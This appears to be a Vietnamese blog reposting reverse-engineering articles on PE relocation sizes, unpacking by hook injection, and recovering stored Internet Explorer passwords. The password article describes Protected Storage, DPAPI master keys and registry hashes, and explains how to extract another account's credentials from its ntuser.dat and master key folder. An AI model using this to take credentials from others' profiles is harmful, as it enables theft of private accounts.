Trao đổi với tôi

http://www.buidao.com

6/27/10

[Reverse] GetRelocSize

Some packers leave a dll's relocation directory intact (e.g. Armadillo). You just have to know the original reloc dir RVA, which is easy to find in most cases.

However, you need to define the right reloc table size, since the PE loader subtracts every block from the size and checks for 0.
That means, you can't just guess and make it big enough to contain all elements. It has to be the exact size of the table.

Well, I was looking for a tool that could calculate the size but couldn't find any.
I started coding my own and that's the result :D

It takes a PE file, displays the correct size for the reloc table and optionally writes the right size to the file.
Supports both normal and PE32+ executables.
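As an added illustration of the size rule above (this is not GetRelocSize's own code), the Python below walks IMAGE_BASE_RELOCATION blocks, sums their SizeOfBlock fields, models the loader's countdown to show why an over- or under-sized directory fails, and writes the result into the relocation data-directory entry of a PE32 or PE32+ header. The reloc blob and the header-only PE image are constructed sample data, and the block offset is taken as a file offset (a real file needs the RVA mapped through the section table first).

```python
import struct

# Index of the base relocation entry in the optional header's data directory
IMAGE_DIRECTORY_ENTRY_BASERELOC = 5
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B


def walk_reloc_blocks(data, offset):
    """Walk IMAGE_BASE_RELOCATION blocks (u32 VirtualAddress, u32 SizeOfBlock,
    then 2-byte entries) from a file offset until the terminating zero block.
    Returns a list of (VirtualAddress, SizeOfBlock)."""
    blocks = []
    while offset + 8 <= len(data):
        va, size = struct.unpack_from("<II", data, offset)
        if size == 0:                      # all-zero header ends the table
            break
        if size < 8 or size % 2 or offset + size > len(data):
            raise ValueError("malformed relocation block at 0x%x" % offset)
        blocks.append((va, size))
        offset += size
    return blocks


def reloc_table_size(data, offset):
    """The exact directory Size: the sum of every block's SizeOfBlock."""
    return sum(size for _, size in walk_reloc_blocks(data, offset))


def loader_accepts(declared_size, blocks):
    """Model of the loader bookkeeping described above: subtract each block
    from the declared size and require the countdown to land on exactly 0.
    Too small underflows mid-table; too large leaves a non-zero remainder."""
    remaining = declared_size
    for _, size in blocks:
        if size > remaining:
            return False
        remaining -= size
    return remaining == 0


def reloc_directory_entry_offset(pe):
    """File offset of the IMAGE_DATA_DIRECTORY entry for base relocations.
    The data directory starts 96 bytes into a PE32 optional header and 112
    bytes into a PE32+ one; each entry is {u32 VirtualAddress, u32 Size}."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    opt = e_lfanew + 4 + 20                # skip signature + COFF file header
    magic = struct.unpack_from("<H", pe, opt)[0]
    if magic == PE32_MAGIC:
        dd = opt + 96
    elif magic == PE32PLUS_MAGIC:
        dd = opt + 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    return dd + IMAGE_DIRECTORY_ENTRY_BASERELOC * 8


def set_reloc_directory_size(pe, size):
    """Write the computed Size into the relocation data directory entry."""
    struct.pack_into("<I", pe, reloc_directory_entry_offset(pe) + 4, size)
    return pe


# --- constructed sample data (not taken from a real binary) -----------------
# Page 0x1000 with two HIGHLOW entries (8 + 2*2 = 12 bytes), page 0x2000 with
# three entries plus an ABSOLUTE pad (8 + 4*2 = 16 bytes), then the terminator.
SAMPLE_RELOCS = (
    struct.pack("<IIHH", 0x1000, 12, 0x3004, 0x3008)
    + struct.pack("<IIHHHH", 0x2000, 16, 0x3010, 0x3014, 0x3018, 0x0000)
    + bytes(8)
)


def build_sample_pe(magic):
    """Minimal header-only PE image with the given optional header magic."""
    pe = bytearray(0x200)
    pe[0:2] = b"MZ"
    struct.pack_into("<I", pe, 0x3C, 0x80)          # e_lfanew
    pe[0x80:0x84] = b"PE\0\0"
    struct.pack_into("<H", pe, 0x80 + 4 + 16,       # SizeOfOptionalHeader
                     224 if magic == PE32_MAGIC else 240)
    struct.pack_into("<H", pe, 0x80 + 24, magic)    # optional header Magic
    return pe


if __name__ == "__main__":
    blocks = walk_reloc_blocks(SAMPLE_RELOCS, 0)
    size = reloc_table_size(SAMPLE_RELOCS, 0)
    print("blocks:", [(hex(va), n) for va, n in blocks], "exact size:", size)
    for guess in (size, size + 8, size - 4):
        verdict = "accepts" if loader_accepts(guess, blocks) else "rejects"
        print("declared %d -> loader %s" % (guess, verdict))
    pe = set_reloc_directory_size(build_sample_pe(PE32PLUS_MAGIC), size)
    print("Size written:", struct.unpack_from("<I", pe, reloc_directory_entry_offset(pe) + 4)[0])
```

With the sample table the exact size is 28; declaring 36 or 24 makes the countdown miss zero, which is the failure the post warns about.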

BEWARE! KOMMANDLINE-APPLIKASHUN!

Source and binary attached :)

Attached File(s)

  • Attached File GetRelocSize.zip (77.17K)

  • reflink: http://forum.tuts4you.com/index.php?s=8a2282d66b755d4ccdcf11bc2b3f14e9&app=blog&module=display&section=blog&blogid=4&showentry=42

[Hooking] Unpacking by hooking?

Let's try something totally crazy. Let's try dynamic unpacking without total unpacking control, without breakpoints, without any kind of debugging whatsoever. Let's merge our unpacking process with the packer itself, binding them into one unique workflow that collects information while the packer is executing. Similar to what we do with debugging, just without the debugger. How do we do this? Can we, for that matter?

We can, with a little help from TitanEngine's hooking library. The idea is to have our unpacker as a library which will be injected into the packed file during its execution. Such a library places hooks inside the packer code which redirect the control flow to our unpacker wherever data collection or execution handling is needed. Those places are usually the spots where the packer processes the import table, processes relocations, jumps to the original entry point or just switches execution from one layer to another.

Benefits of such an approach? Even though it is slightly harder to create and test such an unpacker, the most notable benefit of unpacking by hooking is total immunity to the various anti-debugging tricks used to detect the unpacking process. The only detections applicable to this unpacking scenario are anti-hooking and memory checksumming. The first is hardly ever used in modern protections due to the large number of false positives it gives, which are triggered by the operating system itself, security software and various window skinning applications. The second one is rarely present, and when it is, it only covers specific memory regions that correspond to a single protection layer. In conclusion, this method of implementing the unpacking process should give us fewer things to worry about.

Implementing this kind of hook requires building custom functions that process the hook events. This is necessary to maintain the packed program's workflow and is exactly why we preserve the register state with PUSHAD and, if there is a jump affected by our hook, even EFLAGS with PUSHFD. These ASM instructions are embedded in our C code and, with the help of the naked function declaration, they become the prologue and epilogue of the function. To apply the hooks we use the DLL_PROCESS_ATTACH event. For example, if we were to hook the UPX code which loads libraries, the hook code flow would look like this:

Since our hooks are 5 bytes long, we need to "borrow" as many instructions as it takes to insert the hook. In this case we are "borrowing" three instructions. These instructions will be executed right after our inserted function is called; this is done to preserve the packer's workflow. As you can see from this diagram, we are using hooks instead of breakpoints. Therefore these hooks will be placed in at least three places: where UPX calls LoadLibraryA, where it calls GetProcAddress, and finally where it jumps to the entry point. The most basic sample UPX unpacker is limited to working on executables which don't import functions by ordinals and use the old jump-to-entry-point method. Quite limited, but enough for a proof of concept of our technique.

Debugging this kind of unpackers can be rather tricky. This video shows a quick and easy way to do it:

Since we are creating a hook library unpacker, we also need a loader which will execute the unpacking target and inject the unpacker library into it. This can be done in a number of ways, but we decided to do it via the debug-detach method. Once both the unpacker hook library and the loader are made, our unpacker is complete. We hope you got the idea of how to use this technique to build your own hooking unpackers from our short blog post. Until next week...

upxHooks
(package contains the unpacker with source and the samples used)

reflink: http://blog.reversinglabs.com/2010/06/unpacking-by-hooking/

6/23/10

[Crypto] Recovering Internet Explorer passwords: theory and practice

Introduction
Types of passwords stored in Internet Explorer
Internet Credentials
AutoComplete data
AutoComplete passwords
FTP passwords
Synchronization passwords
Identities passwords
AutoForms data
Content Advisor password
Brief overview of Internet Explorer password recovery programs
PIEPR - the first acquaintance
Three real-life examples
Recovering current user's FTP passwords
Recovering website passwords from unloadable operating system
Recovering uncommonly stored passwords
Conclusion

Introduction

Nobody is likely to dispute the fact that Internet Explorer is today's most popular Web browser. According to the statistics, approximately 70% of online users prefer this program. Arguments about its pros and cons may last forever; still, this browser is the leader of its industry, and that is a fact that requires no proof. Internet Explorer carries several built-in technologies designed to make the average user's life easier. One of them, IntelliSense, takes care of routine tasks like the automatic completion of visited webpage addresses, automatic filling of form fields, users' passwords, etc.

Many of today's websites require registration, which means the user has to enter a user name and password. If you use more than a dozen such websites, you will likely need a password manager. All modern browsers have a built-in password manager in their arsenal, and Internet Explorer is no exception. Indeed, why would one have to remember yet another password if it is going to be forgotten some time soon anyway? It is much easier to have the browser do the routine work of remembering and storing passwords for you. It's convenient and comfortable.

This would be a totally perfect solution; however, if your Windows operating system crashed, or was reinstalled not the way it is supposed to be reinstalled, you can easily lose the entire list of your precious passwords. That's the toll for the comfort and convenience. It's good that just about every website has a life-saving 'I forgot my password' button. However, this button will not always take the headache away from you.

Each software developer solves the forgotten password recovery problem in their own way. Some of them officially recommend copying a couple of important files to another folder, others send all registered users a special utility that allows managing the migration of private data, and the rest pretend they are not seeing the problem. Nevertheless, demand creates supply, and password recovery programs are currently in great demand.

In this article, let's try to classify types of private data stored in Internet Explorer, look at programs for the recovery of the data, and study real-life examples of recovering lost Internet passwords.

Types of passwords stored in Internet Explorer

Internet Explorer may store the following types of passwords:

  • Internet Credentials
  • AutoComplete Data
  • AutoComplete Passwords
  • FTP Passwords
  • Synchronization Passwords for cached websites
  • Identities Passwords
  • AutoForms Data
  • Content Advisor Password

Let's take a closer look at each listed item.

Internet Credentials for websites

Internet credentials are the user's logins and passwords required for accessing certain websites, which are processed by the wininet.dll library. For example, when you try to enter the protected area of a website, you may see the following user name and password prompt (Figure 1).

Web site passwords
Figure 1. Internet Credentials dialog.


If the option 'Remember my password' is selected in that prompt, the user credentials will be saved to your local computer. The older Windows 9x versions stored that data in the user's PWL file; Windows 2000 and newer store it in the Protected Storage.

AutoComplete Data

AutoComplete data (passwords are covered further below) are also stored in the Protected Storage and appear as lists of HTML form field names and the corresponding user data. For example, if an HTML page contains an e-mail address entry field: once the user has entered his e-mail address, the Protected Storage will hold the HTML field name, the address value, and the time the record was last accessed.

The HTML page title and website address are not stored. Is that good or bad? It's difficult to say; more likely good than bad. Here are the obvious pros: it saves space and speeds up the browser's performance. If you think the latter is insignificant, try to imagine the several extra lookups you would have to perform in a multi-thousand-entry auto-fill list (this is not as rare as it may seem).

Another obvious plus is that data for HTML form fields with identical names (and often identical purposes) will be stored in the same place, and the common data will be used for the automatic filling of such pages. Consider this example. If one HTML page contains an auto-fill field with the name 'email', and the user entered his e-mail address in that field, IE will put, roughly, 'email=my@email.com' in the storage. From now on, if the user opens another website which has a page with the same field name 'email', the user will be offered to auto-fill it with the value that he entered on the first page (my@email.com). Thus, the browser somewhat discovers AI capabilities within itself.

The major drawback of this data storage method comes out of the advantage we just described. Imagine the user has entered auto-fill data on a webpage. If someone knows the HTML form field name, that person can create his own simple HTML page with the same field name and open it from a local disk. To uncover the data entered in this field, such a person will not even have to connect to the Internet and open the original WWW address.

AutoComplete Passwords

In the case of password data, however, as you might have guessed, the data will not be filled in automatically, since auto-complete passwords are stored along with the Web page name, and each password is bound to only one specific HTML page.

In the new version, Internet Explorer 7, both AutoComplete passwords and data are encrypted completely differently; the new encryption method is free from the shortcoming just described (if that can be classified as a shortcoming.)

It is worth noticing that Internet Explorer allows users to manage auto-fill parameters manually through the options menu (Figure 2).

Internet Explorer AutoComplete settings
Figure 2. Internet Explorer AutoComplete settings.

FTP passwords

FTP site passwords are stored pretty much the same way. It is worth noting that, beginning with Windows XP, FTP passwords are additionally encrypted with DPAPI. This encryption method uses the user's logon password. Naturally, this makes it much more difficult to recover such lost passwords manually, since now one would need to have the user's Master Key, SID and the account password.

Synchronization Passwords for cached websites

Synchronization passwords free the user from having to enter passwords for cached websites (sites set to be available offline.) Passwords of this type are also stored in IE's Protected Storage.

Identities passwords

So are identities passwords. The identity-based access management mechanism is not widespread in Microsoft's products, except, perhaps, Outlook Express.

AutoForms Data

A special paragraph must cover the form auto-fill method, which constitutes a hybrid way of storing data. This method stores the actual data in the Protected Storage, while the URL the data belong to is stored in the user's registry. The URL written in the registry is not stored as plaintext; it is stored as a hash. Here is the algorithm for reading form auto-fill data in IE 4 - 6:

//Get autoform password by given URL
BOOL CAutoformDecrypter::LoadPasswords(LPCTSTR cszUrl, CStringArray *saPasswords)
{
    assert(cszUrl && saPasswords);

    saPasswords->RemoveAll();

    //Check if autoform passwords are present in registry
    if ( EntryPresent(cszUrl) )
    {
        //Read PStore autoform passwords
        return PStoreReadAutoformPasswords(cszUrl,saPasswords);
    }

    return FALSE;
}


//Check if autoform passwords are present
BOOL CAutoformDecrypter::EntryPresent(LPCTSTR cszUrl)
{
    assert(cszUrl);

    DWORD dwRet, dwValue, dwSize=sizeof(dwValue);
    LPCTSTR cszHash=GetHash(cszUrl);

    //problems computing the hash
    if ( !cszHash )
        return FALSE;

    //Check the registry: the hashed URL is the value name under the SPW key
    dwRet=SHGetValue(HKCU,_T("Software\\Microsoft\\Internet Explorer\\IntelliForms\\SPW"), cszHash, NULL, &dwValue, &dwSize);
    delete[] (LPTSTR)cszHash;

    if ( dwRet==ERROR_SUCCESS )
        return TRUE;

    m_dwLastError=E_NOTFOUND;
    return FALSE;
}


//retrieve hash by given URL text and translate it into a printable string
LPCTSTR CAutoformDecrypter::GetHash(LPCTSTR cszUrl)
{
    assert(cszUrl);

    BYTE buf[0x10];
    LPTSTR pRet=NULL;
    int i;

    if ( HashData(cszUrl,buf,sizeof(buf)) )
    {
        //Allocate some space: one TCHAR per hash byte plus the terminator
        pRet=new TCHAR [sizeof(buf) + 1];
        if ( pRet)
        {
            for ( i=0; i<sizeof(buf); i++ )
            {
                // Translate it into human readable format: keep 6 bits of each
                // byte and shift them into the printable range 0x20..0x5F
                pRet[i]=(TCHAR) ((buf[i] & 0x3F) + 0x20);
            }
            pRet[i]=_T('\0');
        }
        else
            m_dwLastError=E_OUTOFMEMORY;
    }

    return pRet;
}


//DoHash wrapper
BOOL CAutoformDecrypter::HashData(LPCTSTR cszData, LPBYTE pBuf,
                                  DWORD dwBufSize)
{
    assert(cszData && pBuf);

    if ( !cszData || !pBuf )
    {
        m_dwLastError=E_ARG;
        return FALSE;
    }

    //Hash the raw bytes of the string (in an ANSI build this is strlen(cszData))
    DoHash((LPBYTE)cszData,(DWORD)(_tcslen(cszData)*sizeof(TCHAR)),pBuf,dwBufSize);
    return TRUE;
}


//Substitution hash: state starts as 0..dwHashSize-1, and every input byte
//(consumed from the last byte to the first) maps each state byte through the
//permutation table after XORing it with the input byte
void CAutoformDecrypter::DoHash(LPBYTE pData, DWORD dwDataSize,
                                LPBYTE pHash, DWORD dwHashSize)
{
    DWORD dw=dwHashSize;

    //pre-init loop
    while ( dw-->0 )
        pHash[dw]=(BYTE)dw;

    //actual hashing stuff
    while ( dwDataSize-->0 )
    {
        for ( dw=dwHashSize; dw-->0; )
        {
            //m_pPermTable = permutation table
            pHash[dw]=m_pPermTable[pHash[dw]^pData[dwDataSize]];
        }
    }
}
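The following is an added Python port of the DoHash/GetHash logic above; it is not PIEPR's code. The permutation table is not reproduced on the page, so PERM_TABLE here is a constructed affine permutation of 0..255 standing in for m_pPermTable; the output shape (16 printable characters in 0x20..0x5F used as the value name under the SPW key) and the byte order (input consumed from the last byte to the first, as the C loops do) follow the original. The SPW snapshot is a constructed dictionary, not a registry dump.

```python
HASH_SIZE = 16

# Constructed stand-in for m_pPermTable: an affine map x -> 167*x + 89 mod 256.
# 167 is odd, so this is a bijection on 0..255; it is NOT the table IE uses.
PERM_TABLE = [(i * 167 + 89) & 0xFF for i in range(256)]


def do_hash(data, hash_size=HASH_SIZE):
    """Port of CAutoformDecrypter::DoHash. The state starts as 0..hash_size-1;
    input bytes are consumed from the LAST byte to the first (the C loop is
    'while (dwDataSize-- > 0)'), and for every byte each state byte is replaced
    by PERM_TABLE[state ^ byte]. Each position evolves independently, so the
    16-byte state is really 16 parallel 8-bit substitution chains."""
    state = list(range(hash_size))
    for b in reversed(data):
        for i in range(hash_size - 1, -1, -1):
            state[i] = PERM_TABLE[state[i] ^ b]
    return bytes(state)


def get_hash(url):
    """Port of GetHash: every hash byte keeps only its low 6 bits, shifted into
    the printable range 0x20..0x5F. The resulting 16-character string is the
    registry value name under
    HKCU\\Software\\Microsoft\\Internet Explorer\\IntelliForms\\SPW."""
    raw = do_hash(url.encode("latin-1"))      # the original hashes the ANSI text
    return "".join(chr((b & 0x3F) + 0x20) for b in raw)


def entry_present(url, spw_values):
    """Port of EntryPresent, with a dict of value names standing in for the
    SHGetValue lookup under the SPW key."""
    return get_hash(url) in spw_values


# Constructed snapshot of SPW value names for the demo (not real data).
SPW_SNAPSHOT = {get_hash("http://example.com/login"): b"<pstore record>"}


if __name__ == "__main__":
    for url in ("http://example.com/login", "http://example.com/other", ""):
        print(repr(url), "->", repr(get_hash(url)), "present:",
              entry_present(url, SPW_SNAPSHOT))
```

Note that only 6 of each byte's 8 bits survive into the value name, and that the name depends on nothing but the URL text; an empty URL yields the untouched initial state, i.e. the characters 0x20 through 0x2F.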

The next, seventh generation of the browser is most likely going to make this mechanism its primary data storage method, abandoning the good old Protected Storage. In other words, auto-fill data and passwords are from now on going to be stored here.

What is so special and interesting in this mechanism that made MS decide to use it as the primary one? Well, first of all, it was the encryption idea, which isn't new at all but is still simple and ingenious. The idea is to stop storing encryption keys and to generate them whenever necessary. The raw material for such keys is the HTML page's Web address.

Let's see how this idea works in action. Here is IE7's simplified algorithm for saving auto-fill data and password fields:

  1. Save Web page's address. We will use this address as the encryption key (EncryptionKey).
  2. Obtain Record Key. RecordKey = SHA(EncryptionKey).
  3. Calculate checksum for RecordKey to ensure the integrity of the record key (the integrity of the actual data will be guaranteed by DPAPI.) RecordKeyCrc = CRC(RecordKey).
  4. Encrypt data (passwords) with the encryption key EncryptedData = DPAPI_Encrypt(Data, EncryptionKey).
  5. Save RecordKeyCrc + RecordKey + EncryptedData in the registry.
  6. Discard EncryptionKey.


It is very, very difficult to recover password without having the original Web page address. The decryption looks pretty much trivial:

  1. When the original Web page is open, we take its address (EncryptionKey) and obtain the record key RecordKey = SHA(EncryptionKey).
  2. Browse through the list of all record keys trying to locate the RecordKey.
  3. If the RecordKey is found, decrypt data stored along with this key using the EncryptionKey. Data = DPAPI_Decrypt(EncryptedData, EncryptionKey).

In spite of the seeming simplicity, this Web password encryption algorithm is one of today's strongest. However, it has a major drawback (or advantage, depending which way you look at it.) If you change or forget the original Web page address, it will be impossible to recover password for it.
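To make the six save steps and three decryption steps concrete, here is an added Python model (not Microsoft's or PIEPR's code). It assumes SHA-1 over the UTF-16LE address for "SHA" and CRC-32 for "CRC", and replaces DPAPI with a stand-in that derives its key from a constructed per-user secret plus the URL as entropy, mirroring DPAPI_Encrypt(Data, EncryptionKey); the HMAC keystream cipher exists only to make the flow runnable and is not a recommendation. What it shows is that the store holds no URLs, only record keys, so a lookup with anything but the original address finds nothing.

```python
import hashlib
import hmac
import struct
import zlib

# Constructed per-user secret standing in for the DPAPI user master key.
USER_MASTER_SECRET = b"constructed-per-user-master-secret"


def record_key(url):
    """Step 2: RecordKey = SHA(EncryptionKey); SHA-1 over the UTF-16LE page
    address is assumed (the article only says 'SHA')."""
    return hashlib.sha1(url.encode("utf-16-le")).digest()


def record_key_crc(rk):
    """Step 3: RecordKeyCrc = CRC(RecordKey); CRC-32 assumed."""
    return zlib.crc32(rk) & 0xFFFFFFFF


def _keystream(key, length):
    """HMAC-SHA256 counter keystream: a toy stream cipher for this demo only."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hmac.new(key, struct.pack("<I", counter), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def dpapi_like_crypt(data, entropy):
    """Stand-in for DPAPI_Encrypt/DPAPI_Decrypt(Data, EncryptionKey). The key is
    derived from the per-user secret AND the URL (DPAPI's optional entropy),
    so decryption needs both the user context and the original address. XOR
    with the keystream is symmetric, so one function serves both directions."""
    key = hmac.new(USER_MASTER_SECRET, entropy.encode("utf-16-le"),
                   hashlib.sha256).digest()
    return bytes(a ^ b for a, b in zip(data, _keystream(key, len(data))))


def save_record(store, url, data):
    """Steps 1-6: keep RecordKeyCrc + RecordKey + EncryptedData, keyed by the
    record key; the URL itself (the EncryptionKey) is written nowhere."""
    rk = record_key(url)
    store[rk] = (record_key_crc(rk), dpapi_like_crypt(data, url))


def load_record(store, url):
    """Decryption steps 1-3: recompute RecordKey from the open page's address,
    look it up, verify its checksum, decrypt with the address as entropy.
    Returns None when no record matches, i.e. the address is not the one the
    data was saved under."""
    rk = record_key(url)
    entry = store.get(rk)
    if entry is None:
        return None
    crc, blob = entry
    if crc != record_key_crc(rk):
        raise ValueError("RecordKey checksum mismatch")
    return dpapi_like_crypt(blob, url)


if __name__ == "__main__":
    store = {}
    save_record(store, "http://example.com/login", b"user=john;pw=constructed")
    print("stored record keys:", [k.hex() for k in store])
    print("original URL   ->", load_record(store, "http://example.com/login"))
    print("trailing slash ->", load_record(store, "http://example.com/login/"))
```

The lookup with a trailing slash returns None, which is the "change or forget the original Web page address" failure mode described above: the record is still there, but nothing identifies it without the exact address.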

Content Advisor password

And the last item on our list is Content Advisor password. Content Advisor was originally developed as a tool for restricting access to certain websites. However, for some reason it was unloved by many users (surely, you may disagree with this.) If you once turned Content Advisor on, entered a password and then forgot it, you will not be able to access the majority of websites on the Internet. Fortunately (or unfortunately), this can be easily fixed.

The actual Content Advisor password is not stored as plaintext. Instead, the system calculates its MD5 hash and stores it in Windows registry. On an attempt to access the restricted area, the password entered by user is also hashed, and the obtained hash is compared with the one stored in the registry. Take a look at PIEPR source code checking Content Advisor password:

void CContentAdvisorDlg::CheckPassword()
{
    CRegistry registry;

    //read the registry
    registry.SetKey(HKLM, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Ratings");

    BYTE pKey[MD5_DIGESTSIZE], pCheck[MD5_DIGESTSIZE];
    if ( !registry.GetBinaryData("Key",pKey,MD5_DIGESTSIZE) )
    {
        MessageBox(MB_ERR,"Can't read the password.");
        return;
    }

    //Get one set by user (GetLength()+1: the terminating NUL is hashed too)
    CString cs;
    m_wndEditPassword.GetWindowText(cs);
    MD5Init();
    MD5Update((LPBYTE)(LPCTSTR)cs,cs.GetLength()+1);
    MD5Final(pCheck);

    //Check hashes
    if ( memcmp(pKey,pCheck,MD5_DIGESTSIZE)==0 )
        MessageBox(MB_OK,"The password is correct!");
    else
        MessageBox(MB_OK,"Wrong password.");
}

The first thing you may think of is to try to find the password by brute force or a dictionary attack. However, there is a more elegant way to do that: you can simply remove the hash from the registry. That's it; so simple... Well, it's better to rename it instead, so that if you ever need it you can restore it. Some programs also let users check the CA password, "drag out" the password hint, toggle the password on/off, etc.
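An added Python equivalent of the check above (not PIEPR's code): MD5Update is handed cs.GetLength()+1 bytes, so the stored 'Key' value is the MD5 of the password including its terminating NUL; the ANSI encoding of the edit-box text is assumed, and the Ratings values below are a constructed snapshot. From a defender's point of view the value is a single unsalted, uniterated MD5, which is why the article's practical remedy is to remove or rename the hash rather than search for the password.

```python
import hashlib
import hmac

MD5_DIGESTSIZE = 16


def content_advisor_hash(password):
    """Hash exactly as CheckPassword does: the MD5 input is the password text
    followed by its terminating NUL byte. No salt, no iteration; ANSI
    (latin-1) text is assumed for the edit-box contents."""
    return hashlib.md5(password.encode("latin-1") + b"\x00").digest()


def check_password(stored_key, candidate):
    """Equivalent of the memcmp against the 'Key' value under
    HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Ratings,
    using a constant-time comparison instead of memcmp."""
    if len(stored_key) != MD5_DIGESTSIZE:
        raise ValueError("Ratings\\Key must be a %d-byte MD5 digest" % MD5_DIGESTSIZE)
    return hmac.compare_digest(stored_key, content_advisor_hash(candidate))


# Constructed snapshot of the Ratings key's values (not a real registry dump).
RATINGS_SNAPSHOT = {"Key": content_advisor_hash("ca-demo"), "Hint": b"demo"}


if __name__ == "__main__":
    print("correct:", check_password(RATINGS_SNAPSHOT["Key"], "ca-demo"))
    print("wrong  :", check_password(RATINGS_SNAPSHOT["Key"], "CA-demo"))
    print("empty password hashes to:", content_advisor_hash("").hex())
```

Because the NUL is part of the input, an empty password hashes to MD5 of a single zero byte rather than to the MD5 of the empty string; a recovery tool that forgets the extra byte will never match a stored key.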

Brief Overview of Internet Explorer Password Recovery Programs

It's worth noticing that not all password recovery programs are aware there are so many ways to store passwords. Most likely, this is related to the fact that some passwords (e.g., synchronization passwords) are not often used in real life, and FTP passwords are not so simple to 'drag out'. Here is a brief overview of the most popular commercial products for recovering passwords for the most popular browser on earth :)

Advanced Internet Explorer Password Recovery from the well-known company ElcomSoft - does not recognize AutoForm passwords and encrypted FTP passwords. It cannot be excluded that the latest version of the program has learnt to do that. Simple, convenient user interface. The program can be upgraded online automatically.

Internet Explorer Key from PassWare - similarly, does not recognize certain types of passwords. Sometimes the program halts with a critical error when reading some uncommon types of IE URLs. Displays the first two characters of the passwords being recovered. The advantages worth noticing are the Spartan user interface and operating convenience.

Internet Explorer Password from Thegrideon Software - not bad, but can recover just three types of Internet Explorer passwords (this is enough for the majority of cases.) Deals with FTP passwords properly. Version 1.1 has problems recovering AutoForm passwords. Has a convenient user interface, which in some ways resembles the one in AIEPR. One can be totally overwhelmed with the beauty and helpfulness of the company's website.

Internet Password Recovery Toolbox from Rixler Software - offers somewhat greater functionality than the previously covered competitors. It can recover encrypted FTP passwords and delete selected resources. However, it has some programming errors. For example, some types of IE records cannot be deleted. The program comes with a great, detailed help file.

ABF Password Recovery from ABF software - quite a good program with a friendly user interface. The list of IE record types supported by the program is not long. Nevertheless, it deals with all of them properly. The program can be classified as a multi-functional one, since it can restore passwords for other programs as well.

The major drawback of all the programs named here is that they can recover passwords only for the user currently logged on.

As it was said above, the general body of stored Internet Explorer resources is kept in a special storage called Protected Storage. Protected Storage was developed specially for storing personal data. Therefore the functions for working with it (called PS API) are not documented. Protected Storage was first introduced with the release of the version 4 of Internet Explorer, which, by the way, unlike the third version, was written from scratch.

So, until very recently, all programs for recovering Internet Explorer passwords used those undocumented APIs. That's the reason why one significant restriction applied to the recovery work: the PS API can only work with passwords for the user that is currently logged on. When the system encrypts data stored in Protected Storage, among other things it uses the user's SID, without which it is literally impossible (taking into account the current level of computing performance) to recover stored passwords.

Protected Storage uses a very well thought-through data encryption method, which uses master keys and strong algorithms such as DES, SHA and SHA-HMAC. Similar data encryption methods are now used in the majority of modern browsers, e.g. in Opera or Firefox. Microsoft, meanwhile, quietly but surely develops and tests new ones. At the time of writing, in the pre-Beta version of Internet Explorer 7 Protected Storage was only used for storing FTP passwords.

The analysis of this preliminary version suggests that Microsoft is preparing another 'surprise' in the form of new, interesting encryption algorithms. It is not known for sure, but most likely the company's new data protection technology, InfoCard, will be involved in the encryption of private data.

Thus, with a great deal of confidence one can assert that with the release of Windows Vista and the 7th version of Internet Explorer passwords will be stored and encrypted with fundamentally new algorithms, and the Protected Storage interface, to all appearances, will become open for third-party developers.

It is somewhat sad, for we think the true potential of Protected Storage was still not uncovered. And this is why we think so:

  • First, Protected Storage is based on a modular structure, which allows plugging other storage providers into it. However, in the 10 years Protected Storage has existed, not a single new storage provider was created. System Protected Storage is the only storage provider in the operating system, and it is used by default.
  • Second, Protected Storage has its own built-in access management system, which, for some reason, is not used in Internet Explorer or in other MS products.
  • Third, it is not very clear why MS has decided to abandon Protected Storage for storing AutoComplete data and passwords. Abandon it as a tried and true data storage, that is, not as a data encryption mechanism. It would be more logical to keep Protected Storage at least for storing data when implementing a new encryption algorithm. Without doubt, there were weighty reasons for that. Therefore, it would be interesting to hear the opinion of MS specialists on this subject.

PIEPR - the First Acquaintance

Passcape Internet Explorer Password Recovery was developed specifically to bypass the PS API's restriction and make it possible to recover passwords directly, from the registry's binary files. Besides, it has a number of additional features for advanced users.

The program's wizard allows you to choose one of several operating modes:

Automatic
Current user's passwords will be recovered by accessing the closed PS API interface. All current user's passwords currently stored in Internet Explorer will be recovered with a single click of the mouse.

Manual
Passwords will be recovered without the PS API. This method's main advantage is the capability to recover passwords from your old Windows account. For that purpose, you will need to enter the path to the user's registry file. Registry files are normally not available for reading; however, the technology used in PIEPR allows doing that (provided you have local administrative rights.)

The user's registry file name is ntuser.dat; it resides in the user's profile, which is normally %SYSTEMDRIVE%:\Documents and Settings\%USERNAME%, where %SYSTEMDRIVE% stands for the system disk with the operating system, and %USERNAME% is normally the account name. For instance, the path to the registry file may look like this: C:\Documents and Settings\John\ntuser.dat

If you have ever been a happy owner of Windows 9x/ME, after you upgrade your operating system to Windows NT, Protected Storage will providently save a copy of your old private data. As a result of that, Protected Storage may contain several user identifiers, so PIEPR will ask you to select the right one before it gets to the decryption of the data (Figure 3).

Protected Storage user  selection
Figure 3. Selecting Protected Storage owner.


One of the listed SIDs will contain data left by the old Windows 9x/ME. That data is additionally encrypted with user's logon password, and PIEPR currently does not support the decryption of such data.

If ntuser.dat contains encrypted passwords (e.g., FTP sites passwords), the program will need additional information in order to decrypt them (Figure 4):

  • Logon password of user whose data are to be decrypted
  • Full path to the user's MasterKey
  • User's SID

DPAPI decryption
Figure 4. DPAPI decryption dialog for FTP passwords.

Normally, the program finds the last two items in user's profile and fills that data automatically. However, if ntuser.dat was copied from another operating system, you will have to take care of that on your own. The easiest way to get the job done is to copy the entire folder with user's Master Key (there may be several of them) to the folder with ntuser.dat. Master Key resides in the following folder on your local computer: %SYSTEMDRIVE%:\Documents and Settings\%USERNAME%\Application Data\Microsoft\Protect\%UserSid%, where %SYSTEMDRIVE% stands for the system disk with the operating system, %USERNAME% - account name, %UserSid% - user's SID. For example, path to the folder with a master key may look as follows: C:\Documents and Settings\John\Application Data\Microsoft\Protect\S-1-5-21-1587165142-6173081522-185545743-1003. Let's make it clear that it is recommended to copy the entire folder S-1-5-21-1587165142-6173081522-185545743-1003, for it may contain several Master Keys. Then PIEPR will select the right key automatically.

Windows marks some folders as hidden or system, so they are invisible in Windows Explorer. To make them visible, enable showing hidden and system objects in the view settings or use an alternative file manager.

Once the folder with user's Master Key was copied to the folder with ntuser.dat, PIEPR will automatically find the required data, so you will only have to enter user's password for recovering FTP passwords.

